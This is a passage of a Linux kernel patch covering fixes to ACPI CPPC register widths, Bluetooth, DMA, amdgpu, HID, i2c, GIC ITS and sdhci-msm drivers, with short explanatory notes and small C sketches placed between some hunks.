+ show_cppc_data(cppc_get_perf_ctrs, cppc_perf_fb_ctrs, reference_perf);
+ show_cppc_data(cppc_get_perf_ctrs, cppc_perf_fb_ctrs, wraparound_time);
+ 
++/* Check for valid access_width, otherwise, fallback to using bit_width */
++#define GET_BIT_WIDTH(reg) ((reg)->access_width ? (8 << ((reg)->access_width - 1)) : (reg)->bit_width)
++
++/* Shift and apply the mask for CPC reads/writes */
++#define MASK_VAL(reg, val) (((val) >> (reg)->bit_offset) & 			\
++					GENMASK(((reg)->bit_width) - 1, 0))
++
+ static ssize_t show_feedback_ctrs(struct kobject *kobj,
+ 		struct kobj_attribute *attr, char *buf)
+ {
+@@ -776,6 +783,7 @@ int acpi_cppc_processor_probe(struct acpi_processor *pr)
+ 			} else if (gas_t->space_id == ACPI_ADR_SPACE_SYSTEM_MEMORY) {
+ 				if (gas_t->address) {
+ 					void __iomem *addr;
++					size_t access_width;
+ 
+ 					if (!osc_cpc_flexible_adr_space_confirmed) {
+ 						pr_debug("Flexible address space capability not supported\n");
+@@ -783,7 +791,8 @@ int acpi_cppc_processor_probe(struct acpi_processor *pr)
+ 							goto out_free;
+ 					}
+ 
+-					addr = ioremap(gas_t->address, gas_t->bit_width/8);
++					access_width = GET_BIT_WIDTH(gas_t) / 8;
++					addr = ioremap(gas_t->address, access_width);
+ 					if (!addr)
+ 						goto out_free;
+ 					cpc_ptr->cpc_regs[i-2].sys_mem_vaddr = addr;
+@@ -979,6 +988,7 @@ int __weak cpc_write_ffh(int cpunum, struct cpc_reg *reg, u64 val)
+ static int cpc_read(int cpu, struct cpc_register_resource *reg_res, u64 *val)
+ {
+ 	void __iomem *vaddr = NULL;
++	int size;
+ 	int pcc_ss_id = per_cpu(cpu_pcc_subspace_idx, cpu);
+ 	struct cpc_reg *reg = &reg_res->cpc_entry.reg;
+ 
+@@ -988,14 +998,14 @@ static int cpc_read(int cpu, struct cpc_register_resource *reg_res, u64 *val)
+ 	}
+ 
+ 	*val = 0;
++	size = GET_BIT_WIDTH(reg);
+ 
+ 	if (reg->space_id == ACPI_ADR_SPACE_SYSTEM_IO) {
+-		u32 width = 8 << (reg->access_width - 1);
+ 		u32 val_u32;
+ 		acpi_status status;
+ 
+ 		status = acpi_os_read_port((acpi_io_address)reg->address,
+-					   &val_u32, width);
++					   &val_u32, size);
+ 		if (ACPI_FAILURE(status)) {
+ 			pr_debug("Error: Failed to read SystemIO port %llx\n",
+ 				 reg->address);
+@@ -1004,17 +1014,24 @@ static int cpc_read(int cpu, struct cpc_register_resource *reg_res, u64 *val)
+ 
+ 		*val = val_u32;
+ 		return 0;
+-	} else if (reg->space_id == ACPI_ADR_SPACE_PLATFORM_COMM && pcc_ss_id >= 0)
++	} else if (reg->space_id == ACPI_ADR_SPACE_PLATFORM_COMM && pcc_ss_id >= 0) {
++		/*
++		 * For registers in PCC space, the register size is determined
++		 * by the bit width field; the access size is used to indicate
++		 * the PCC subspace id.
++		 */
++		size = reg->bit_width;
+ 		vaddr = GET_PCC_VADDR(reg->address, pcc_ss_id);
++	}
+ 	else if (reg->space_id == ACPI_ADR_SPACE_SYSTEM_MEMORY)
+ 		vaddr = reg_res->sys_mem_vaddr;
+ 	else if (reg->space_id == ACPI_ADR_SPACE_FIXED_HARDWARE)
+ 		return cpc_read_ffh(cpu, reg, val);
+ 	else
+ 		return acpi_os_read_memory((acpi_physical_address)reg->address,
+-				val, reg->bit_width);
++				val, size);
+ 
+-	switch (reg->bit_width) {
++	switch (size) {
+ 	case 8:
+ 		*val = readb_relaxed(vaddr);
+ 		break;
+@@ -1028,27 +1045,37 @@ static int cpc_read(int cpu, struct cpc_register_resource *reg_res, u64 *val)
+ 		*val = readq_relaxed(vaddr);
+ 		break;
+ 	default:
+-		pr_debug("Error: Cannot read %u bit width from PCC for ss: %d\n",
+-			 reg->bit_width, pcc_ss_id);
++		if (reg->space_id == ACPI_ADR_SPACE_SYSTEM_MEMORY) {
++			pr_debug("Error: Cannot read %u bit width from system memory: 0x%llx\n",
++				size, reg->address);
++		} else if (reg->space_id == ACPI_ADR_SPACE_PLATFORM_COMM) {
++			pr_debug("Error: Cannot read %u bit width from PCC for ss: %d\n",
++				size, pcc_ss_id);
++		}
+ 		return -EFAULT;
+ 	}
+ 
++	if (reg->space_id == ACPI_ADR_SPACE_SYSTEM_MEMORY)
++		*val = MASK_VAL(reg, *val);
++
+ 	return 0;
+ }
+ 
+ static int cpc_write(int cpu, struct cpc_register_resource *reg_res, u64 val)
+ {
+ 	int ret_val = 0;
++	int size;
+ 	void __iomem *vaddr = NULL;
+ 	int pcc_ss_id = per_cpu(cpu_pcc_subspace_idx, cpu);
+ 	struct cpc_reg *reg = &reg_res->cpc_entry.reg;
+ 
++	size = GET_BIT_WIDTH(reg);
++
+ 	if (reg->space_id == ACPI_ADR_SPACE_SYSTEM_IO) {
+-		u32 width = 8 << (reg->access_width - 1);
+ 		acpi_status status;
+ 
+ 		status = acpi_os_write_port((acpi_io_address)reg->address,
+-					    (u32)val, width);
++					    (u32)val, size);
+ 		if (ACPI_FAILURE(status)) {
+ 			pr_debug("Error: Failed to write SystemIO port %llx\n",
+ 				 reg->address);
+@@ -1056,17 +1083,27 @@ static int cpc_write(int cpu, struct cpc_register_resource *reg_res, u64 val)
+ 		}
+ 
+ 		return 0;
+-	} else if (reg->space_id == ACPI_ADR_SPACE_PLATFORM_COMM && pcc_ss_id >= 0)
++	} else if (reg->space_id == ACPI_ADR_SPACE_PLATFORM_COMM && pcc_ss_id >= 0) {
++		/*
++		 * For registers in PCC space, the register size is determined
++		 * by the bit width field; the access size is used to indicate
++		 * the PCC subspace id.
++		 */
++		size = reg->bit_width;
+ 		vaddr = GET_PCC_VADDR(reg->address, pcc_ss_id);
++	}
+ 	else if (reg->space_id == ACPI_ADR_SPACE_SYSTEM_MEMORY)
+ 		vaddr = reg_res->sys_mem_vaddr;
+ 	else if (reg->space_id == ACPI_ADR_SPACE_FIXED_HARDWARE)
+ 		return cpc_write_ffh(cpu, reg, val);
+ 	else
+ 		return acpi_os_write_memory((acpi_physical_address)reg->address,
+-				val, reg->bit_width);
++				val, size);
++
++	if (reg->space_id == ACPI_ADR_SPACE_SYSTEM_MEMORY)
++		val = MASK_VAL(reg, val);
+ 
+-	switch (reg->bit_width) {
++	switch (size) {
+ 	case 8:
+ 		writeb_relaxed(val, vaddr);
+ 		break;
+@@ -1080,8 +1117,13 @@ static int cpc_write(int cpu, struct cpc_register_resource *reg_res, u64 val)
+ 		writeq_relaxed(val, vaddr);
+ 		break;
+ 	default:
+-		pr_debug("Error: Cannot write %u bit width to PCC for ss: %d\n",
+-			 reg->bit_width, pcc_ss_id);
++		if (reg->space_id == ACPI_ADR_SPACE_SYSTEM_MEMORY) {
++			pr_debug("Error: Cannot write %u bit width to system memory: 0x%llx\n",
++				size, reg->address);
++		} else if (reg->space_id == ACPI_ADR_SPACE_PLATFORM_COMM) {
++			pr_debug("Error: Cannot write %u bit width to PCC for ss: %d\n",
++				size, pcc_ss_id);
++		}
+ 		ret_val = -EFAULT;
+ 		break;
+ 	}
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index 954f7f3b5cc30..6a772b955d69d 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -535,6 +535,8 @@ static const struct usb_device_id blacklist_table[] = {
+ 	/* Realtek 8852BE Bluetooth devices */
+ 	{ USB_DEVICE(0x0cb8, 0xc559), .driver_info = BTUSB_REALTEK |
+ 						     BTUSB_WIDEBAND_SPEECH },
++	{ USB_DEVICE(0x0bda, 0x4853), .driver_info = BTUSB_REALTEK |
++						     BTUSB_WIDEBAND_SPEECH },
+ 	{ USB_DEVICE(0x0bda, 0x887b), .driver_info = BTUSB_REALTEK |
+ 						     BTUSB_WIDEBAND_SPEECH },
+ 	{ USB_DEVICE(0x0bda, 0xb85b), .driver_info = BTUSB_REALTEK |
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index 33956ddec9337..179278b801eb3 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -1645,6 +1645,9 @@ static bool qca_wakeup(struct hci_dev *hdev)
+ 	struct hci_uart *hu = hci_get_drvdata(hdev);
+ 	bool wakeup;
+ 
++	if (!hu->serdev)
++		return true;
++
+ 	/* BT SoC attached through the serial bus is handled by the serdev driver.
+ 	 * So we need to use the device handle of the serdev driver to get the
+ 	 * status of device may wakeup.
+@@ -2257,16 +2260,21 @@ static int qca_serdev_probe(struct serdev_device *serdev)
+ 		    (data->soc_type == QCA_WCN6750 ||
+ 		     data->soc_type == QCA_WCN6855)) {
+ 			dev_err(&serdev->dev, "failed to acquire BT_EN gpio\n");
+-			power_ctrl_enabled = false;
++			return PTR_ERR(qcadev->bt_en);
+ 		}
+ 
++		if (!qcadev->bt_en)
++			power_ctrl_enabled = false;
++
+ 		qcadev->sw_ctrl = devm_gpiod_get_optional(&serdev->dev, "swctrl",
+ 					       GPIOD_IN);
+ 		if (IS_ERR(qcadev->sw_ctrl) &&
+ 		    (data->soc_type == QCA_WCN6750 ||
+ 		     data->soc_type == QCA_WCN6855 ||
+-		     data->soc_type == QCA_WCN7850))
+-			dev_warn(&serdev->dev, "failed to acquire SW_CTRL gpio\n");
++		     data->soc_type == QCA_WCN7850)) {
++			dev_err(&serdev->dev, "failed to acquire SW_CTRL gpio\n");
++			return PTR_ERR(qcadev->sw_ctrl);
++		}
+ 
+ 		qcadev->susclk = devm_clk_get_optional(&serdev->dev, NULL);
+ 		if (IS_ERR(qcadev->susclk)) {
+@@ -2285,10 +2293,13 @@ static int qca_serdev_probe(struct serdev_device *serdev)
+ 		qcadev->bt_en = devm_gpiod_get_optional(&serdev->dev, "enable",
+ 					       GPIOD_OUT_LOW);
+ 		if (IS_ERR(qcadev->bt_en)) {
+-			dev_warn(&serdev->dev, "failed to acquire enable gpio\n");
+-			power_ctrl_enabled = false;
++			dev_err(&serdev->dev, "failed to acquire enable gpio\n");
++			return PTR_ERR(qcadev->bt_en);
+ 		}
+ 
++		if (!qcadev->bt_en)
++			power_ctrl_enabled = false;
++
+ 		qcadev->susclk = devm_clk_get_optional(&serdev->dev, NULL);
+ 		if (IS_ERR(qcadev->susclk)) {
+ 			dev_warn(&serdev->dev, "failed to acquire clk\n");
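
The qca_serdev_probe() hunks above tighten devm_gpiod_get_optional() error handling: a real lookup failure now aborts the probe, while an absent (NULL) GPIO merely disables power control. A minimal userspace sketch of that three-way pattern, with hypothetical stand-ins for the gpiod API:

#include <errno.h>
#include <stdio.h>

/* stand-in for devm_gpiod_get_optional(): <0 error, 0 absent, >0 handle */
static int get_gpio_optional(int simulate)
{
	return simulate;
}

static int probe(int simulate)
{
	int power_ctrl_enabled = 1;
	int gpio = get_gpio_optional(simulate);

	if (gpio < 0) {
		fprintf(stderr, "failed to acquire enable gpio\n");
		return gpio;		/* hard failures are now fatal */
	}
	if (!gpio)
		power_ctrl_enabled = 0;	/* optional GPIO absent: degrade */

	printf("probed, power_ctrl_enabled=%d\n", power_ctrl_enabled);
	return 0;
}

int main(void)
{
	probe(3);		/* GPIO present */
	probe(0);		/* GPIO absent */
	probe(-ENODEV);		/* lookup failed */
	return 0;
}
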
+diff --git a/drivers/dma/idma64.c b/drivers/dma/idma64.c
+index f4c07ad3be15b..af8777a1ec2e3 100644
+--- a/drivers/dma/idma64.c
++++ b/drivers/dma/idma64.c
+@@ -167,6 +167,10 @@ static irqreturn_t idma64_irq(int irq, void *dev)
+ 	u32 status_err;
+ 	unsigned short i;
+ 
++	/* Since IRQ may be shared, check if DMA controller is powered on */
++	if (status == GENMASK(31, 0))
++		return IRQ_NONE;
++
+ 	dev_vdbg(idma64->dma.dev, "%s: status=%#x\n", __func__, status);
+ 
+ 	/* Check if we have any interrupt from the DMA controller */
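
The idma64 hunk works because a powered-down device on a shared interrupt line reads back as all ones, so the handler can disclaim the interrupt before touching any state. A compact illustration in plain C, with the status passed in rather than read from a register:

#include <stdint.h>
#include <stdio.h>

enum irqreturn { IRQ_NONE, IRQ_HANDLED };

static enum irqreturn fake_irq(uint32_t status)
{
	if (status == UINT32_MAX)	/* GENMASK(31, 0): device is off */
		return IRQ_NONE;	/* let other sharers handle it */
	printf("handling status %#x\n", status);
	return IRQ_HANDLED;
}

int main(void)
{
	fake_irq(UINT32_MAX);	/* disclaimed */
	fake_irq(0x1);		/* handled */
	return 0;
}
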
+diff --git a/drivers/dma/idxd/perfmon.c b/drivers/dma/idxd/perfmon.c
+index d73004f47cf4b..612ef13b71603 100644
+--- a/drivers/dma/idxd/perfmon.c
++++ b/drivers/dma/idxd/perfmon.c
+@@ -529,14 +529,11 @@ static int perf_event_cpu_offline(unsigned int cpu, struct hlist_node *node)
+ 		return 0;
+ 
+ 	target = cpumask_any_but(cpu_online_mask, cpu);
+-
+ 	/* migrate events if there is a valid target */
+-	if (target < nr_cpu_ids)
++	if (target < nr_cpu_ids) {
+ 		cpumask_set_cpu(target, &perfmon_dsa_cpu_mask);
+-	else
+-		target = -1;
+-
+-	perf_pmu_migrate_context(&idxd_pmu->pmu, cpu, target);
++		perf_pmu_migrate_context(&idxd_pmu->pmu, cpu, target);
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/dma/owl-dma.c b/drivers/dma/owl-dma.c
+index b6e0ac8314e5c..0819f19c87cc5 100644
+--- a/drivers/dma/owl-dma.c
++++ b/drivers/dma/owl-dma.c
+@@ -249,7 +249,7 @@ static void pchan_update(struct owl_dma_pchan *pchan, u32 reg,
+ 	else
+ 		regval &= ~val;
+ 
+-	writel(val, pchan->base + reg);
++	writel(regval, pchan->base + reg);
+ }
+ 
+ static void pchan_writel(struct owl_dma_pchan *pchan, u32 reg, u32 data)
+@@ -273,7 +273,7 @@ static void dma_update(struct owl_dma *od, u32 reg, u32 val, bool state)
+ 	else
+ 		regval &= ~val;
+ 
+-	writel(val, od->base + reg);
++	writel(regval, od->base + reg);
+ }
+ 
+ static void dma_writel(struct owl_dma *od, u32 reg, u32 data)
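
Both owl-dma hunks fix the same read-modify-write slip: the helper computed the updated register value in regval but then wrote the bare mask val back. The corrected shape, as a standalone sketch:

#include <stdint.h>
#include <stdio.h>

static uint32_t fake_reg;	/* stands in for pchan->base + reg */

static void update_bits(uint32_t mask, int set)
{
	uint32_t regval = fake_reg;	/* read */

	if (set)
		regval |= mask;		/* modify */
	else
		regval &= ~mask;

	fake_reg = regval;		/* write back regval, not the mask */
}

int main(void)
{
	fake_reg = 0xf0;
	update_bits(0x1, 1);
	/* prints 0xf1; the old bug would have stored just 0x1 */
	printf("%#x\n", fake_reg);
	return 0;
}
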
+diff --git a/drivers/dma/tegra186-gpc-dma.c b/drivers/dma/tegra186-gpc-dma.c
+index 75af3488a3baf..e70b7c41dcab7 100644
+--- a/drivers/dma/tegra186-gpc-dma.c
++++ b/drivers/dma/tegra186-gpc-dma.c
+@@ -742,6 +742,9 @@ static int tegra_dma_get_residual(struct tegra_dma_channel *tdc)
+ 	bytes_xfer = dma_desc->bytes_xfer +
+ 		     sg_req[dma_desc->sg_idx].len - (wcount * 4);
+ 
++	if (dma_desc->bytes_req == bytes_xfer)
++		return 0;
++
+ 	residual = dma_desc->bytes_req - (bytes_xfer % dma_desc->bytes_req);
+ 
+ 	return residual;
+diff --git a/drivers/dma/xilinx/xilinx_dpdma.c b/drivers/dma/xilinx/xilinx_dpdma.c
+index 84dc5240a8074..93938ed80fc83 100644
+--- a/drivers/dma/xilinx/xilinx_dpdma.c
++++ b/drivers/dma/xilinx/xilinx_dpdma.c
+@@ -214,7 +214,8 @@ struct xilinx_dpdma_tx_desc {
+  * @running: true if the channel is running
+  * @first_frame: flag for the first frame of stream
+  * @video_group: flag if multi-channel operation is needed for video channels
+- * @lock: lock to access struct xilinx_dpdma_chan
++ * @lock: lock to access struct xilinx_dpdma_chan. Must be taken before
++ *        @vchan.lock, if both are to be held.
+  * @desc_pool: descriptor allocation pool
+  * @err_task: error IRQ bottom half handler
+  * @desc: References to descriptors being processed
+@@ -1097,12 +1098,14 @@ static void xilinx_dpdma_chan_vsync_irq(struct  xilinx_dpdma_chan *chan)
+ 	 * Complete the active descriptor, if any, promote the pending
+ 	 * descriptor to active, and queue the next transfer, if any.
+ 	 */
++	spin_lock(&chan->vchan.lock);
+ 	if (chan->desc.active)
+ 		vchan_cookie_complete(&chan->desc.active->vdesc);
+ 	chan->desc.active = pending;
+ 	chan->desc.pending = NULL;
+ 
+ 	xilinx_dpdma_chan_queue_transfer(chan);
++	spin_unlock(&chan->vchan.lock);
+ 
+ out:
+ 	spin_unlock_irqrestore(&chan->lock, flags);
+@@ -1264,10 +1267,12 @@ static void xilinx_dpdma_issue_pending(struct dma_chan *dchan)
+ 	struct xilinx_dpdma_chan *chan = to_xilinx_chan(dchan);
+ 	unsigned long flags;
+ 
+-	spin_lock_irqsave(&chan->vchan.lock, flags);
++	spin_lock_irqsave(&chan->lock, flags);
++	spin_lock(&chan->vchan.lock);
+ 	if (vchan_issue_pending(&chan->vchan))
+ 		xilinx_dpdma_chan_queue_transfer(chan);
+-	spin_unlock_irqrestore(&chan->vchan.lock, flags);
++	spin_unlock(&chan->vchan.lock);
++	spin_unlock_irqrestore(&chan->lock, flags);
+ }
+ 
+ static int xilinx_dpdma_config(struct dma_chan *dchan,
+@@ -1495,7 +1500,9 @@ static void xilinx_dpdma_chan_err_task(struct tasklet_struct *t)
+ 		    XILINX_DPDMA_EINTR_CHAN_ERR_MASK << chan->id);
+ 
+ 	spin_lock_irqsave(&chan->lock, flags);
++	spin_lock(&chan->vchan.lock);
+ 	xilinx_dpdma_chan_queue_transfer(chan);
++	spin_unlock(&chan->vchan.lock);
+ 	spin_unlock_irqrestore(&chan->lock, flags);
+ }
+ 
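
The xilinx_dpdma hunks establish one consistent nesting for the two channel locks, matching the updated @lock kerneldoc: chan->lock is always the outer lock and chan->vchan.lock the inner one, on the vsync IRQ, issue_pending and error-tasklet paths alike. A userspace pthread sketch of the invariant (names are illustrative):

#include <pthread.h>
#include <stdio.h>

static pthread_mutex_t chan_lock = PTHREAD_MUTEX_INITIALIZER;	/* outer */
static pthread_mutex_t vchan_lock = PTHREAD_MUTEX_INITIALIZER;	/* inner */

static void queue_transfer(void)
{
	/* caller holds both locks, always acquired in the same order */
	printf("queue transfer\n");
}

static void issue_pending(void)
{
	pthread_mutex_lock(&chan_lock);		/* outer first */
	pthread_mutex_lock(&vchan_lock);	/* then inner */
	queue_transfer();
	pthread_mutex_unlock(&vchan_lock);	/* release in reverse */
	pthread_mutex_unlock(&chan_lock);
}

int main(void)
{
	issue_pending();
	return 0;
}

Taking the locks in the same order everywhere is what rules out an ABBA deadlock between the IRQ path and issue_pending().
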
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+index 260e6a3316db0..7d5fbaaba72f7 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+@@ -1779,6 +1779,7 @@ int amdgpu_amdkfd_gpuvm_alloc_memory_of_gpu(
+ err_bo_create:
+ 	amdgpu_amdkfd_unreserve_mem_limit(adev, aligned_size, flags);
+ err_reserve_limit:
++	amdgpu_sync_free(&(*mem)->sync);
+ 	mutex_destroy(&(*mem)->lock);
+ 	if (gobj)
+ 		drm_gem_object_put(gobj);
+diff --git a/drivers/gpu/drm/amd/amdgpu/sdma_v5_2.c b/drivers/gpu/drm/amd/amdgpu/sdma_v5_2.c
+index 856db876af141..c7af36370b0de 100644
+--- a/drivers/gpu/drm/amd/amdgpu/sdma_v5_2.c
++++ b/drivers/gpu/drm/amd/amdgpu/sdma_v5_2.c
+@@ -345,17 +345,21 @@ static void sdma_v5_2_ring_emit_hdp_flush(struct amdgpu_ring *ring)
+ 	u32 ref_and_mask = 0;
+ 	const struct nbio_hdp_flush_reg *nbio_hf_reg = adev->nbio.hdp_flush_reg;
+ 
+-	ref_and_mask = nbio_hf_reg->ref_and_mask_sdma0 << ring->me;
+-
+-	amdgpu_ring_write(ring, SDMA_PKT_HEADER_OP(SDMA_OP_POLL_REGMEM) |
+-			  SDMA_PKT_POLL_REGMEM_HEADER_HDP_FLUSH(1) |
+-			  SDMA_PKT_POLL_REGMEM_HEADER_FUNC(3)); /* == */
+-	amdgpu_ring_write(ring, (adev->nbio.funcs->get_hdp_flush_done_offset(adev)) << 2);
+-	amdgpu_ring_write(ring, (adev->nbio.funcs->get_hdp_flush_req_offset(adev)) << 2);
+-	amdgpu_ring_write(ring, ref_and_mask); /* reference */
+-	amdgpu_ring_write(ring, ref_and_mask); /* mask */
+-	amdgpu_ring_write(ring, SDMA_PKT_POLL_REGMEM_DW5_RETRY_COUNT(0xfff) |
+-			  SDMA_PKT_POLL_REGMEM_DW5_INTERVAL(10)); /* retry count, poll interval */
++	if (ring->me > 1) {
++		amdgpu_asic_flush_hdp(adev, ring);
++	} else {
++		ref_and_mask = nbio_hf_reg->ref_and_mask_sdma0 << ring->me;
++
++		amdgpu_ring_write(ring, SDMA_PKT_HEADER_OP(SDMA_OP_POLL_REGMEM) |
++				  SDMA_PKT_POLL_REGMEM_HEADER_HDP_FLUSH(1) |
++				  SDMA_PKT_POLL_REGMEM_HEADER_FUNC(3)); /* == */
++		amdgpu_ring_write(ring, (adev->nbio.funcs->get_hdp_flush_done_offset(adev)) << 2);
++		amdgpu_ring_write(ring, (adev->nbio.funcs->get_hdp_flush_req_offset(adev)) << 2);
++		amdgpu_ring_write(ring, ref_and_mask); /* reference */
++		amdgpu_ring_write(ring, ref_and_mask); /* mask */
++		amdgpu_ring_write(ring, SDMA_PKT_POLL_REGMEM_DW5_RETRY_COUNT(0xfff) |
++				  SDMA_PKT_POLL_REGMEM_DW5_INTERVAL(10)); /* retry count, poll interval */
++	}
+ }
+ 
+ /**
+diff --git a/drivers/hid/hid-logitech-dj.c b/drivers/hid/hid-logitech-dj.c
+index 08768e5accedc..57697605b2e24 100644
+--- a/drivers/hid/hid-logitech-dj.c
++++ b/drivers/hid/hid-logitech-dj.c
+@@ -965,9 +965,7 @@ static void logi_hidpp_dev_conn_notif_equad(struct hid_device *hdev,
+ 		}
+ 		break;
+ 	case REPORT_TYPE_MOUSE:
+-		workitem->reports_supported |= STD_MOUSE | HIDPP;
+-		if (djrcv_dev->type == recvr_type_mouse_only)
+-			workitem->reports_supported |= MULTIMEDIA;
++		workitem->reports_supported |= STD_MOUSE | HIDPP | MULTIMEDIA;
+ 		break;
+ 	}
+ }
+diff --git a/drivers/hid/i2c-hid/i2c-hid-core.c b/drivers/hid/i2c-hid/i2c-hid-core.c
+index 969f8eb086f02..0b05bb1e4410e 100644
+--- a/drivers/hid/i2c-hid/i2c-hid-core.c
++++ b/drivers/hid/i2c-hid/i2c-hid-core.c
+@@ -61,7 +61,6 @@
+ /* flags */
+ #define I2C_HID_STARTED		0
+ #define I2C_HID_RESET_PENDING	1
+-#define I2C_HID_READ_PENDING	2
+ 
+ #define I2C_HID_PWR_ON		0x00
+ #define I2C_HID_PWR_SLEEP	0x01
+@@ -193,15 +192,10 @@ static int i2c_hid_xfer(struct i2c_hid *ihid,
+ 		msgs[n].len = recv_len;
+ 		msgs[n].buf = recv_buf;
+ 		n++;
+-
+-		set_bit(I2C_HID_READ_PENDING, &ihid->flags);
+ 	}
+ 
+ 	ret = i2c_transfer(client->adapter, msgs, n);
+ 
+-	if (recv_len)
+-		clear_bit(I2C_HID_READ_PENDING, &ihid->flags);
+-
+ 	if (ret != n)
+ 		return ret < 0 ? ret : -EIO;
+ 
+@@ -569,9 +563,6 @@ static irqreturn_t i2c_hid_irq(int irq, void *dev_id)
+ {
+ 	struct i2c_hid *ihid = dev_id;
+ 
+-	if (test_bit(I2C_HID_READ_PENDING, &ihid->flags))
+-		return IRQ_HANDLED;
+-
+ 	i2c_hid_get_input(ihid);
+ 
+ 	return IRQ_HANDLED;
+diff --git a/drivers/hid/intel-ish-hid/ipc/ipc.c b/drivers/hid/intel-ish-hid/ipc/ipc.c
+index a49c6affd7c4c..dd5fc60874ba1 100644
+--- a/drivers/hid/intel-ish-hid/ipc/ipc.c
++++ b/drivers/hid/intel-ish-hid/ipc/ipc.c
+@@ -948,6 +948,7 @@ struct ishtp_device *ish_dev_init(struct pci_dev *pdev)
+ 	if (!dev)
+ 		return NULL;
+ 
++	dev->devc = &pdev->dev;
+ 	ishtp_device_init(dev);
+ 
+ 	init_waitqueue_head(&dev->wait_hw_ready);
+@@ -983,7 +984,6 @@ struct ishtp_device *ish_dev_init(struct pci_dev *pdev)
+ 	}
+ 
+ 	dev->ops = &ish_hw_ops;
+-	dev->devc = &pdev->dev;
+ 	dev->mtu = IPC_PAYLOAD_SIZE - sizeof(struct ishtp_msg_hdr);
+ 	return dev;
+ }
+diff --git a/drivers/i2c/i2c-core-base.c b/drivers/i2c/i2c-core-base.c
+index 5e3976ba52650..1ebc953799149 100644
+--- a/drivers/i2c/i2c-core-base.c
++++ b/drivers/i2c/i2c-core-base.c
+@@ -2075,13 +2075,18 @@ static int i2c_check_for_quirks(struct i2c_adapter *adap, struct i2c_msg *msgs,
+  * Returns negative errno, else the number of messages executed.
+  *
+  * Adapter lock must be held when calling this function. No debug logging
+- * takes place. adap->algo->master_xfer existence isn't checked.
++ * takes place.
+  */
+ int __i2c_transfer(struct i2c_adapter *adap, struct i2c_msg *msgs, int num)
+ {
+ 	unsigned long orig_jiffies;
+ 	int ret, try;
+ 
++	if (!adap->algo->master_xfer) {
++		dev_dbg(&adap->dev, "I2C level transfers not supported\n");
++		return -EOPNOTSUPP;
++	}
++
+ 	if (WARN_ON(!msgs || num < 1))
+ 		return -EINVAL;
+ 
+@@ -2148,11 +2153,6 @@ int i2c_transfer(struct i2c_adapter *adap, struct i2c_msg *msgs, int num)
+ {
+ 	int ret;
+ 
+-	if (!adap->algo->master_xfer) {
+-		dev_dbg(&adap->dev, "I2C level transfers not supported\n");
+-		return -EOPNOTSUPP;
+-	}
+-
+ 	/* REVISIT the fault reporting model here is weak:
+ 	 *
+ 	 *  - When we get an error after receiving N bytes from a slave,
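
The i2c-core hunk hoists the adap->algo->master_xfer check out of i2c_transfer() into __i2c_transfer(), so callers that enter with the adapter lock already held get the same -EOPNOTSUPP instead of a NULL dereference. The shape of the refactor, sketched with hypothetical userspace names:

#include <errno.h>
#include <stdio.h>

struct adapter {
	int (*master_xfer)(void);
};

static int inner_transfer(struct adapter *adap)
{
	if (!adap->master_xfer)
		return -EOPNOTSUPP;	/* check lives on the common path */
	return adap->master_xfer();
}

static int outer_transfer(struct adapter *adap)
{
	/* lock(adap); */
	int ret = inner_transfer(adap);
	/* unlock(adap); */
	return ret;
}

static int do_xfer(void) { return 1; }

int main(void)
{
	struct adapter good = { .master_xfer = do_xfer };
	struct adapter bad = { 0 };

	printf("%d %d\n", outer_transfer(&good), inner_transfer(&bad));
	return 0;
}
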
+diff --git a/drivers/irqchip/irq-gic-v3-its.c b/drivers/irqchip/irq-gic-v3-its.c
+index 4d03fb3a82460..f9ab5cfc9b947 100644
+--- a/drivers/irqchip/irq-gic-v3-its.c
++++ b/drivers/irqchip/irq-gic-v3-its.c
+@@ -4535,13 +4535,8 @@ static int its_vpe_irq_domain_alloc(struct irq_domain *domain, unsigned int virq
+ 		set_bit(i, bitmap);
+ 	}
+ 
+-	if (err) {
+-		if (i > 0)
+-			its_vpe_irq_domain_free(domain, virq, i);
+-
+-		its_lpi_free(bitmap, base, nr_ids);
+-		its_free_prop_table(vprop_page);
+-	}
++	if (err)
++		its_vpe_irq_domain_free(domain, virq, i);
+ 
+ 	return err;
+ }
+diff --git a/drivers/mmc/host/sdhci-msm.c b/drivers/mmc/host/sdhci-msm.c
+index a5ab2af3e5201..e37fb25577c0f 100644
+--- a/drivers/mmc/host/sdhci-msm.c
++++ b/drivers/mmc/host/sdhci-msm.c
+@@ -2831,6 +2831,11 @@ static __maybe_unused int sdhci_msm_runtime_suspend(struct device *dev)
+ 	struct sdhci_host *host = dev_get_drvdata(dev);
+ 	struct sdhci_pltfm_host *pltfm_host = sdhci_priv(host);
+ 	struct sdhci_msm_host *msm_host = sdhci_pltfm_priv(pltfm_host);
++	unsigned long flags;
++
++	spin_lock_irqsave(&host->lock, flags);
++	host->runtime_suspended = true;
++	spin_unlock_irqrestore(&host->lock, flags);
+ 
+ 	/* Drop the performance vote */
+ 	dev_pm_opp_set_rate(dev, 0);
+@@ -2845,6 +2850,7 @@ static __maybe_unused int sdhci_msm_runtime_resume(struct device *dev)
+ 	struct sdhci_host *host = dev_get_drvdata(dev);
+ 	struct sdhci_pltfm_host *pltfm_host = sdhci_priv(host);
+ 	struct sdhci_msm_host *msm_host = sdhci_pltfm_priv(pltfm_host);
++	unsigned long flags;
+ 	int ret;
+ 
+ 	ret = clk_bulk_prepare_enable(ARRAY_SIZE(msm_host->bulk_clks),
+@@ -2863,7 +2869,15 @@ static __maybe_unused int sdhci_msm_runtime_resume(struct device *dev)
+ 
+ 	dev_pm_opp_set_rate(dev, msm_host->clk_rate);
+ 
+-	return sdhci_msm_ice_resume(msm_host);
++	ret = sdhci_msm_ice_resume(msm_host);
++	if (ret)
++		return ret;
++
++	spin_lock_irqsave(&host->lock, flags);
++	host->runtime_suspended = false;
++	spin_unlock_irqrestore(&host->lock, flags);
++
++	return ret;
+ }
+ 
+ static const struct dev_pm_ops sdhci_msm_pm_ops = {
+diff --git a/drivers/mtd/nand/raw/diskonchip.c b/drivers/mtd/nand/raw/diskonchip.c
